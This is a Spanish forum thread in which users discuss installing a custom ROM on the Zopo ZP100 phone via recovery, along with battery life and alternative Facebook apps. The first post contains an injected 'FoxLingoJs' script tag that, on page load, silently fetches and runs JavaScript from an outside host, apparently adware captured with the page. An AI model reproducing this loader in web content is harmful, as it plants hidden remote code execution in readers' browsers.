Roms y herramientas para el Zopo ZP100

Es un zip asi que se instalara desde el recovery<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 
Yeap, confirmo, se instala desde recovery... le estoy dando una prueba.
De momento, muy buenas sensaciones.

Enviado desde mi XT910 usando Tapatalk 2
 
si , se instala con recovery, pero el archivo comprimido del boot no se como ponerlo. de momento va bien sin ponerlo ya vere mas tarde.
 
@silverius el boot es un archivo winrar pero no winrar zip. mi duda es que no me aparece como archivo zip, entonces como lo instalo?
 
Última edición por un moderador:
perdona tenias razon al descomprimir el archivo aparecen 3 archivos winrar zip. ok ya estan instalados.
 
Oye pues teníais razón,
La aplicación de Facebook se come la batería. Me ha bastado con cerrar la sesión y... 17 horas de pantalla y aun me queda un 55% de batería!!! Antes con 13 horas la batería estaba muerta.
 
Oye pues teníais razón,
La aplicación de Facebook se come la batería. Me ha bastado con cerrar la sesión y... 17 horas de pantalla y aun me queda un 55% de batería!!! Antes con 13 horas la batería estaba muerta.

Prueba la aplicación Friendcaster... a mi me costó un poco acostumbrarme, pero ahora no la cambio... mejor q la oficial de facebook y tu batería mejora.
Eso si, configura para que notifique cada bastante tiempo o nunca y la actualizas tu.

Enviado desde mi XT910 usando Tapatalk 2
 
Esta nueva ron va de lujo la bateria dura bastante mas que con la revo orijinal con la que ya estaba durando bastante mas que antes.todo lo demas funciona bien.fluida despues de eliminar todo lo que no uso e instalar mis app.
 
Esta nueva ron va de lujo la bateria dura bastante mas que con la revo orijinal con la que ya estaba durando bastante mas que antes.todo lo demas funciona bien.fluida despues de eliminar todo lo que no uso e instalar mis app.

+1

Enviado desde mi XT910 usando Tapatalk 2
 

Del blog

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba